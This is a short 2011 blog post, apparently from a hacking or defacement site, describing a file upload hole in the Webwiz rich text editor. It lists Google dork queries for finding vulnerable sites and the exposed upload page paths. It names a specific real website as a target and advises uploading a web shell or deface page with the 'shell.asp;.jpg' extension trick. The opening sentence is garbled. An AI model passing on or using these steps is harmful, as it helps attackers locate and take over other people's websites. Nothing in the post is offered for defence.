Monday, July 4, 2011

HACK RTE Webwiz Vulnerability -File Upload Vulnerability


Webwiz rich text editor HTML code is carried in the open after they are sent charCode due functioning of the page

Google Dorks: Google Dorks:
inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/ 
Exploit: 
site.com/rte/RTE_popup_file_atch.asp 
site.com/admin/RTE_popup_file_atch.asp

http://www.billkonigsberg.com/RTE_popup_file_atch.asp
you can also upload a shell or directly your deface page shell format:- shell.asp;.jpg 
Hacked site

0 comments:

Post a Comment